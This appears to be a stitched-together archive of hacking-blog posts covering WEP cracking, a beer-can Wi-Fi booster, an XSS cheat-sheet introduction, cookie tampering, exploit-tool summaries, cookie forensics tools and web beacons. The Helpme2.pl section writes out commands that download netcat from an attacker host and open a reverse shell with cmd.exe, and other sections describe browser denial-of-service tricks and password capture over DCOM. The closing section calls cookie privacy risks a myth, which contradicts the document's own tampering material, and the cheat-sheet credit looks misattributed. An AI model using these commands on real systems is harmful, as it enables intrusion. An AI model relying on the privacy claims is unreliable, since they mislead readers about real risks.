Get the HACK out of here!

The more I think about hacking, the more I'm convinced that nothing is secure in this world. From your computer systems to the cell phone on which you just texted, every system can fall to one simple vulnerability or loophole left in your gadget by its developer. The only way to secure your information is by not turning on your gizmo.
Hacking is not a matter of chance; it is actually a lot of hard work done by a destructive mind. Well then, what exactly do we mean by ethical hacking? The answer is simple: hacking done within ethics. But most people are confused by this sentence. All they ask me is how hacking could be done in an ethical way. Guys, hacking itself is never ethical; it is only the intention with which it is done. If the intention is positive, then it's penetration testing, done in a supervised manner, to avoid malicious hacking. But if the intentions are negative, then it's malicious hacking. Still, being a hacker, I know this much: nobody in my field has a white collar.
People using software for hacking or extracting information out of a person's computer are not really hackers. That could be done by anybody, just by downloading any of the freely and easily available programs on the internet. These people are "script kiddies", who either are attention seekers or just have some small malicious intent. India doesn't have a very strong background in hacking, as there haven't been many of these "hackers". But here we are, still struggling to make a job out of this.

Regards,
Ishan Chandra
[http://about.me/ishaanchandra]

Cracking Wireless Networks: How to Crack WEP or WPA Secured Networks

The video shows how to crack WEP- or WPA-secured networks. It also shows how to prevent people from cracking your wireless network(s).



Free Download WiFi Slax Wireless Hacking Live CD v3.1 + Plug-ins, Updated



WEP is an encryption scheme based on the RC4 cipher that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble the information in each data frame as it leaves the access point or client adapter, and the scrambled message is then decrypted by the receiver. Both sides must have the same WEP key, which is usually 64 or 128 bits long in total.

A semi-random 24-bit number called an Initialization Vector (IV) is part of the key, so a 64-bit WEP key actually contains only 40 bits of secret key material while a 128-bit key has 104. The IV is placed in the encrypted frame's header and is transmitted in plain text.

Traditionally, cracking WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packets, a process that could take hours or even days depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key.
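Why the 24-bit IV is the weak point, as an added example (not code from the original post): the IV is the only part of the RC4 key that changes per frame, so once an IV repeats under the same WEP key the keystream repeats too, and the birthday bound over 2^24 values says that happens after only a few thousand frames. Function names, and the frames-per-second figure used in the demo, are my own assumptions.

```python
import math

WEP_IV_BITS = 24              # per-frame IV, sent in clear in the frame header
IV_SPACE = 2 ** WEP_IV_BITS   # 16,777,216 possible IVs


def secret_key_bits(advertised_bits):
    """Secret key material in an advertised WEP key size: 64 -> 40 and
    128 -> 104, because 24 of the advertised bits are the public IV."""
    if advertised_bits not in (64, 128):
        raise ValueError("WEP keys are advertised as 64- or 128-bit")
    return advertised_bits - WEP_IV_BITS


def iv_reuse_probability(frames):
    """Probability that at least two of `frames` randomly chosen IVs collide
    (exact birthday computation over the 2^24 IV space). A repeated (IV, key)
    pair makes RC4 emit the same keystream twice, the core WEP weakness."""
    no_collision = 1.0
    for i in range(frames):
        no_collision *= (IV_SPACE - i) / IV_SPACE
    return 1.0 - no_collision


def frames_until_reuse(probability):
    """Smallest number of frames after which an IV repeat is at least this
    likely. Starts from the closed-form approximation n ~ sqrt(2N ln(1/(1-p))),
    steps back a little, then walks the exact product up to the threshold."""
    if not 0 < probability < 1:
        raise ValueError("probability must be strictly between 0 and 1")
    n = int(math.sqrt(2 * IV_SPACE * math.log(1 / (1 - probability))))
    n = max(n - 50, 1)
    while iv_reuse_probability(n) < probability:
        n += 1
    return n


def seconds_until_reuse(probability, frames_per_second):
    """How long a network at a given traffic rate needs before keystream
    reuse is likely; this is the 'depends on the volume of traffic' part."""
    return frames_until_reuse(probability) / frames_per_second


if __name__ == "__main__":
    print("secret bits in a 64-bit WEP key:", secret_key_bits(64))
    print("frames for a 50% chance of an IV repeat:", frames_until_reuse(0.5))
    # 500 frames/s is an assumed, moderately busy network
    print("at 500 frames/s that is about", seconds_until_reuse(0.5, 500), "s")
```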

Basic Directions:

1) Boot from CD

2) Get the WEP key

3) Write it down

4) Reboot into Windows

5) Connect using the WEP key.

Boost Your Wi-Fi Signals With Beer Cans

I love a good hack, especially one that requires me to throw back a cold one before hand (or during). This simple wifi boost has actually been shown to increase signal strength by at least 2 to 4 bars. And, well, I will drink to that.
These instructions came to us via The Chive and we think they are most definitely worth checking out. But here is the most important question: what kind of beer will you use?
For this project you are going to need scissors, a utility knife, some adhesive putty and an empty beer can. More than one empty beer can is acceptable but don’t kid yourself, the router only needs the one.
The first step is to wash out your empty beer can, unless of course said beer is a can of Pabst Blue Ribbon. If it is PBR, promptly go drink a better beer. You really should be ashamed of yourself.
Once the can has dried, you will want to remove its pull tab.
Only perform this next step if you have not been drinking. Using the utility knife, saw off the bottom of the can. Chances are your can will not have a red dotted line. If you see one, put down the knife…you’ve had too much beer.

You’ll notice in the above step that the can’s pull tab has returned. Clearly, there are only two possible reasons for this. One, you are really drunk and you never removed the tab in the first place. Or, the more likely answer, beer cans can regenerate themselves.

It’s the home stretch! You just need to attach your modded beer can to the wifi router. Hopefully no other parts of the can have actually grown back. You now have beer-fi!
So, what kind of beer did you use?

XSS - Cross Site Scripting Cheat Sheet


XSS - Cross Site Scripting Cheat Sheet By Ishan

Note: XSS is Cross Site Scripting. If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you. This page is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate XSS vectors or how to write the actual cookie/credential stealing/replay/session riding portion of the attack. It will simply show the underlying methodology, and you can infer the rest. Also, please note that my XSS page has been replicated by the OWASP 2.0 Guide in the Appendix section. However, because this is a living document, I suggest you continue to use this site to stay up to date.

Also, please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the page; however, if you have specific concerns about outdated or obscure versions, please download them from Evolt. Please see the XML format of the XSS Cheat Sheet if you intend to use CAL9000 or other automated tools. If you have an RSS reader, feel free to subscribe to the Web Application Security RSS feed below, or join the forum.



XSS Cheat Sheet by Valentin

Here you find my custom XSS and CSRF cheat sheet. I know that there are many good cheat sheets out there, but since some of them are offline from time to time, I decided to create a little collection of useful XSS stuff. I added some stuff from other well known cheat sheets (e.g. from http://ha.ckers.org/xss.html); please scroll down to see a complete list of sources.

These XSS codes can be used to test your own website for XSS/CSRF vulnerabilities. Some of them can even be used to bypass various XSS/CSRF filters. I did not include any details or explanations since I assume you are experienced with this type of vulnerability and know what you are doing.

What is a Cookie?


Persistent vs. Non-Persistent

Persistent cookies are stored in a text file (cookies.txt under Netscape, and multiple *.txt files for Internet Explorer) on the client and are valid for as long as the expiry date allows (see below). Non-persistent cookies are stored in RAM on the client and are destroyed when the browser is closed or the cookie is explicitly killed by a log-off script.

Secure vs. Non-Secure

Secure cookies can only be sent over HTTPS (SSL). Non-secure cookies can be sent over HTTPS or regular HTTP. The title "secure" is somewhat misleading: it only provides transport security. Any data sent to the client should be considered under the total control of the end user, regardless of the transport mechanism in use.
Cookies can be set using two main methods, HTTP headers and JavaScript. JavaScript is becoming a popular way to set and read cookies, as some proxies will filter cookies set as part of an HTTP response header. Cookies enable a server and browser to pass information between themselves across sessions. Remembering that HTTP is stateless, this may simply be between requests for documents in the same session, or even when a user requests an image embedded in a page. It is rather like a server stamping a client and saying "show this to me next time you come in". Cookies cannot be shared (read or written) across DNS domains.
In correct client operation, Domain A can't read Domain B's cookies, but there have been many vulnerabilities in popular web clients which have allowed exactly this. Under HTTP, the server responds to a request with an extra header. This header tells the client to add this information to the client's cookie file or to store the information in RAM. After this, all requests to that URL from the browser will include the cookie information as an extra header in the request.

Cookie Structure

domain: The website domain that created, and that can read, the variable.
flag: A TRUE/FALSE value indicating whether all machines within a given domain can access the variable.
path: The path attribute supplies a URL range for which the cookie is valid. If path is set to /reference, the cookie will be sent for URLs in /reference as well as sub-directories such as /reference/web protocols. A path of "/" indicates that the cookie will be used for all URLs at the site from which the cookie originated.
secure: A TRUE/FALSE value indicating whether an SSL connection with the domain is needed to access the variable.
expiration: The time at which the variable will expire. Omitting the expiration date signals the browser to store the cookie only in memory; it will be erased when the browser is closed.
name: The name of the variable (in this case Apache).
The limit on the size of each cookie (name and value combined) is 4 KB. A maximum of 20 cookies per server or domain is allowed.
Cookies are the preferred method of maintaining state in the HTTP protocol. They are, however, also used as a convenient mechanism to store user preferences and other data, including session tokens. Both persistent and non-persistent cookies, secure or insecure, can be modified by the client and sent to the server with URL requests. Therefore any attacker can modify cookie content to his advantage. There is a popular misconception that non-persistent cookies cannot be modified, but this is not true; tools like WinHex are freely available. SSL also only protects the cookie in transit.
The extent of cookie manipulation depends on what the cookie is used for, but usually ranges from session tokens to arrays that make authorization decisions.
A real-world example:
Cookie: lang=en-us; ADMIN=no; y=1; time=10:30GMT;
The attacker can simply modify the cookie to:
Cookie: lang=en-us; ADMIN=yes; y=1; time=12:30GMT;
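The ADMIN=no/ADMIN=yes problem above, and one server-side fix, as an added example (not code from the original post): the insecure check trusts a client-controlled flag, while the hardened version only trusts a value that still carries the server's own HMAC tag, and issues it with the Secure flag and an expiry the post describes. The secret, the function names and the cookie name "role" are my own assumptions.

```python
import base64
import hashlib
import hmac

# Constructed placeholder; a real server loads this from a secret store.
SERVER_SECRET = b"placeholder-change-me-32-random-bytes"


def parse_cookie_header(header):
    """Split a request 'Cookie:' header into a name -> value dict."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


def is_admin_insecure(cookie_header):
    """The pattern from the example above: an authorization decision taken
    straight from a client-controlled flag. Editing ADMIN=no to ADMIN=yes
    is all it takes to pass this check."""
    return parse_cookie_header(cookie_header).get("ADMIN") == "yes"


def sign_value(value):
    """Append an HMAC-SHA256 tag so the server can detect client edits."""
    tag = hmac.new(SERVER_SECRET, value.encode(), hashlib.sha256).digest()
    return value + "." + base64.urlsafe_b64encode(tag).decode().rstrip("=")


def verify_value(signed):
    """Return the original value, or None if the tag does not match."""
    if signed is None or "." not in signed:
        return None
    value, _, _ = signed.rpartition(".")  # the tag itself never contains '.'
    expected = sign_value(value)
    if not hmac.compare_digest(expected.encode(), signed.encode()):
        return None
    return value


def is_admin_hardened(cookie_header):
    """Trust the role only when the server's own signature verifies."""
    role = verify_value(parse_cookie_header(cookie_header).get("role"))
    return role == "admin"


def set_cookie_header(name, value, max_age=3600):
    """Issue the signed value with the protections the post discusses:
    Secure restricts it to HTTPS, HttpOnly keeps it away from page scripts,
    and Max-Age makes it expire rather than live forever."""
    return (f"{name}={sign_value(value)}; Path=/; Max-Age={max_age}; "
            "Secure; HttpOnly; SameSite=Strict")
```

Signing stops silent edits but not replay of a cookie the user legitimately holds, so the server still needs its own session record and expiry for the role.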
Hacking Tool: Helpme2.pl
  • Helpme2.pl is exploit code for the WinHelp32.exe remote buffer overrun vulnerability.
  • This tool generates an HTML file with a given hidden command.
  • When this HTML file is sent to a victim through e-mail, it infects the victim's computer and executes the hidden code.

Helpme2.pl is exploit code written to take advantage of the winhelp32.exe vulnerability. The Perl script takes a command to execute (WinExec, SW_HIDE) and produces an HTML output file. There are two versions:

HelpMe.pl was written to work with kernel32.dll version 5.0.2195.4272, while HelpMe2.pl was written to work with kernel32.dll version 5.0.2195.2778.
The exploit does the following:
  1. Executes tftp.exe-i attacker.ip.address get nc.exe c: \winnt\system32\nc.exe
  2. Executes nc.exe attacker.ip.address 80-e cmd.exe
Hacking Tool: WindowBomb


An e-mail sent with such HTML files attached will create pop-up windows until the PC's memory is exhausted.
Window bombs are code written to cause annoying behaviour on the user's screen. The variants seen include:

Deadly image: a GIF which crashes the browser when clicked.
Uncloseable window: opens a document that uses the JavaScript unload event handler to reopen the document if you try to leave or close the window.
Invincible alert dialogue: executes a function which generates an alert dialogue and then runs the function again.
Reload-o-rama: refreshes the document from the history 1000 times per second, leaving the back and stop buttons useless.
Window spawner: continuously opens new windows until the RAM or swap space is full.
Jiggy window: causes the window to dance around the screen so fast that the controls cannot be reached.
Jiggy window spawner: creates an endless stream of little dancing windows.
While loop processor hog: executes an endless loop to chew up processor time.
Recursive frames: opens a set of recursive frames until the RAM or swap space is full.
Memory bomb: dynamically allocates RAM to the browser until the RAM or swap space is full.
Super memory bomb: opens a 100K document with numerous recursive tables and ordered lists.
Hacking Tool: IEEN
  • IEEN remotely controls Internet Explorer using DCOM.
  • If an attacker knows the account name and password of a remote machine, they can remotely control software components on it using DCOM. Internet Explorer is one of the components that can be controlled this way.
IEEN: The Distributed Component Object Model (DCOM) is a protocol that enables software components to communicate directly over a network in a reliable, secure and efficient manner. DCOM is installed on most Windows machines by default and runs without being noticed by users.
However, if an attacker knows the account name and password of a remote machine, he can remotely control the software components on it using DCOM. For example, Internet Explorer is one of the software components that can be controlled. IE'en is a tool that can be used to remotely control Internet Explorer using DCOM.
Summary of IE'en functionality:
  • Remotely connects to or activates Internet Explorer
  • Captures data sent and received by Internet Explorer
  • Even on SSL-encrypted websites (e.g. Hotmail), IE'en can capture the user ID and password in plain text
  • Changes the web page in the remote IE window
  • Makes the remote IE window visible or invisible
---------------------------------------------------------------------------------------------

Summary
  • Attacking web applications is the easiest way to compromise hosts, networks and users.
  • Generally nobody notices web application penetration until serious damage has been done.
  • Web application vulnerabilities can be eliminated to a great extent by ensuring proper design specifications and coding practices, as well as by implementing common security procedures.
  • Various tools help the attacker view source code and scan for security holes.
  • The first rule in web application development from a security standpoint is not to rely on client-side data for critical processes. Using an encrypted session such as SSL and "secure" cookies is advocated instead of using hidden fields, which are easily manipulated by attackers.
  • A cross-site scripting vulnerability is caused by the failure of a web-based application to validate user-supplied input before returning it to the client system.
  • If the application accepts only expected input, then XSS can be significantly reduced.

    Regards,

    Ishan Chandra

Download Free Internet Explorer Cookie Forensic Analysis Tool: GALLETA


Many important files within Microsoft Windows have structures that are undocumented. One of the principles of computer forensics is that all analysis methodologies must be well documented and repeatable, and they must have an acceptable margin of error. Currently, there is a lack of open source methods and tools that forensic analysts can rely upon to examine the data found in proprietary Microsoft files.

Many computer crime investigations require the reconstruction of a subject's Internet Explorer cookie files. Since this analysis technique is executed regularly, we researched the structure of the data found in the cookie files. Galleta, the Spanish word for "cookie", was developed to examine the contents of the cookie files. The foundation of Galleta's examination methodology will be documented in an upcoming whitepaper. Galleta will parse the information in a cookie file and output the results in a field-delimited manner so that it may be imported into your favourite spreadsheet program. Galleta is built to work on multiple platforms and will execute on Windows (through Cygwin), Mac OS X, Linux and *BSD platforms.

Usage: galleta [options]
-t Field Delimiter (TAB by default)

Example Usage:

[kjones:galleta/galleta_20030410_1/bin] kjones% ./galleta antihackertoolkit.txt > cookies.txt

Open cookies.txt as a TAB-delimited file in MS Excel to further sort and filter your results.


SOURCE: http://www.foundstone.com

Learn How to Collect and Analyze Cookies Using COOKIEDIGGER


CookieDigger helps identify weak cookie generation and insecure implementations of session management in web applications. The tool works by collecting and analyzing the cookies issued by a web application to multiple users. It reports on the predictability and entropy of the cookie and on whether critical information, such as the user name and password, is included in the cookie values.
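The three checks just described (predictability, sequential ids, and credentials embedded in the value), run over cookies issued to several test users, as an added example that is not CookieDigger's own code: a weak base64-wrapped record is compared against a random-looking token. The test accounts, the two cookie schemes and all function names are constructed for the example.

```python
import base64
import hashlib
import re

# Constructed test accounts (placeholders, not real credentials).
ACCOUNTS = [("alice", "s3cret1"), ("bob", "hunter2"), ("carol", "qwerty9")]


def weak_cookie(index, user, password):
    """Model of the weak scheme the post warns about: a base64-wrapped record
    carrying a sequential id plus the user's name and password."""
    record = f"id={1000 + index};user={user};pwd={password}"
    return base64.b64encode(record.encode()).decode()


def strong_cookie(index):
    """Stand-in for a random token (deterministic here so the example is
    reproducible; a real server would use secrets.token_hex)."""
    return hashlib.sha256(f"constructed-seed-{index}".encode()).hexdigest()


def decoded_views(value):
    """The raw value plus its base64 decoding when one exists; the decoded
    view comes first so embedded fields are examined before the encoding."""
    views = [value]
    try:
        views.insert(0, base64.b64decode(value, validate=True).decode())
    except Exception:
        pass
    return views


def leaked_accounts(values, accounts):
    """Users whose name or password is visible in some issued cookie."""
    leaked = set()
    for value in values:
        for view in decoded_views(value):
            for user, password in accounts:
                if user in view or password in view:
                    leaked.add(user)
    return sorted(leaked)


def is_sequential(values):
    """True when the first multi-digit number in consecutive cookies steps
    by exactly one: the signature of a counter-based session id."""
    numbers = []
    for value in values:
        found = [int(n) for view in decoded_views(value)
                 for n in re.findall(r"\d{3,}", view)]
        if not found:
            return False
        numbers.append(found[0])
    return all(b - a == 1 for a, b in zip(numbers, numbers[1:]))


def fixed_position_ratio(values):
    """Share of character positions identical across every sample: a crude
    predictability measure; random tokens should score near zero."""
    width = min(len(v) for v in values)
    fixed = sum(1 for i in range(width) if len({v[i] for v in values}) == 1)
    return fixed / width


def report(values, accounts):
    return {"leaked_accounts": leaked_accounts(values, accounts),
            "sequential_ids": is_sequential(values),
            "fixed_position_ratio": round(fixed_position_ratio(values), 2)}
```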


SOURCE: http://www.foundstone.com

What are Web Beacons OR Web Bugs?


Web beacons, also called web bugs and clear GIFs, are used in combination with cookies to help people running websites understand the behaviour of their customers. A web beacon is typically a transparent graphic image (usually 1 pixel x 1 pixel) that is placed on a site or in an email.

The use of a web beacon allows the site to record the simple action of the user opening the page that contains the beacon. The beacon is one of the ingredients of the page, just like other images and text, except it is so small and clear that it is effectively invisible. Web pages and graphical emails use presentation code that tells your computer what to do when a page is opened. While they may contain some of the text that you see on the screen at the time, they typically contain a number of instructions, or 'tags', that then ask the website's server to send you further content (such as an image or a block of text that changes frequently). Web beacons are retrieved in the same way, and the action of calling the material from another server allows the event to be counted.

When a user's browser requests information from a website in this way, certain simple information can also be gathered, such as: the IP address of your computer; the time the material was viewed; the type of browser that retrieved the image; and the existence of cookies previously set by that server. This is information that is available to any web server you visit. Web beacons do not give any "extra" information away. They are simply a convenient way of gathering the simplest of statistics and managing cookies.

Web beacons are typically used by a third party to monitor the activity of a site. Turning off the browser's cookies will prevent web beacons from tracking your specific activity. The web beacon may still record an anonymous visit from your IP address, but unique information will not be recorded.

For example, a company owning a network of sites may use web beacons in order to count and recognise users travelling around its network. Rather than gathering statistics and managing cookies on all their servers separately, they can use web beacons to keep them all together. Being able to recognise you enables the site owner to personalise your visit and make it more user friendly.

Why do websites use Web Beacons?

Web beacons are used by website owners to log activity on their web pages and websites. Their purpose depends on what a site wants to understand about how visitors interact with its pages.
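A privacy-audit check for the pattern described above, as an added example that is not from the original post: it scans a page for images that are 1x1 (or smaller) or hidden by inline CSS and reports whether each one is fetched from a third-party host, which is the case the post singles out. The sample HTML, the hostnames and the class and function names are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not from any real site): one real logo and two
# beacon-style images, one served by a third party and one hidden by CSS.
SAMPLE_HTML = """
<html><body>
<h1>Monthly newsletter</h1>
<img src="https://example.org/logo.png" width="200" height="60" alt="logo">
<img src="https://tracker.example.net/pixel.gif?uid=123" width="1" height="1" alt="">
<img src="/stats/open.gif?msg=42" style="display: none">
</body></html>
"""


class BeaconFinder(HTMLParser):
    """Flag <img> elements that are 1x1 (or 0x0) or hidden by inline CSS:
    the invisible-image pattern the post describes."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.beacons = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        attr = {name: (value or "") for name, value in attrs}
        tiny = (attr.get("width", "").strip() in ("0", "1")
                and attr.get("height", "").strip() in ("0", "1"))
        style = attr.get("style", "").replace(" ", "").lower()
        hidden = "display:none" in style or "visibility:hidden" in style
        if not (tiny or hidden):
            return
        src = attr.get("src", "")
        # A relative URL is fetched from the page's own host.
        host = urlparse(src).hostname or self.page_host
        self.beacons.append({
            "src": src,
            "host": host,
            "third_party": host != self.page_host,
            "reason": "1x1" if tiny else "hidden",
        })


def find_beacons(html, page_host):
    """Return the beacon-like images in `html` as served from `page_host`."""
    finder = BeaconFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.beacons


if __name__ == "__main__":
    for beacon in find_beacons(SAMPLE_HTML, "example.org"):
        print(beacon)
```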

Cookies are bad for privacy - Is that true?


This is a myth: cookies are a friendly internet tool, primarily used by the advertising and e-commerce industry to make surfing easier and quicker. They have several roles, none of which can compromise your privacy:
  1. Protection: to ensure you are a genuine visitor and not someone else using your password.
  2. Authenticating and speeding up your identification and e-commerce transactions.
  3. Recognising preferences, e.g. remembering user names and passwords for websites.
  4. Capping the frequency of ad serving, and making sure that advertisements are rotated and not duplicated during any one visit to a site.
Many websites use the services of other companies to provide the content and services on their website. These third parties may provide content or services to more than one website. If they are using cookies, in theory they can understand what that cookie does on a number of different sites.